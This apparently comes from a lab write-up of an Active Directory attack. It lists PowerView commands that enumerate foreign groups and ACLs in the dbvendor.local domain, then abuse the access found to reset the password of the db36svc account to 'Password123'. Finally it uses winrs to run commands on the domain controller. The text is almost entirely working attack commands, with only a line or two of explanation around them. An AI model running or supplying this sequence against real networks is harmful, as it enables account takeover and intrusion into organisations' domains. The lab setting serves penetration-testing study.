Loading PowerView

. .\\PowerView.ps1

Now Finding Foreign Groups

Find-ForeignGroup -Verbose

Getting Interesting ACLs for another domain

Find-InterestingDomainAcl -ResolveGUIDs -Domain dbvendor.local

We Will notice that our users have All access on the Group Of Users

Now let’s change the password of that user

Set-DomainUserPassword -Identity db36svc -AccountPassword (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Domain dbvendor.local

Entering The Domain Controller

winrs -r:db-dc.db.local -u:dbvendor\\db36svc -p:Password123 "whoami"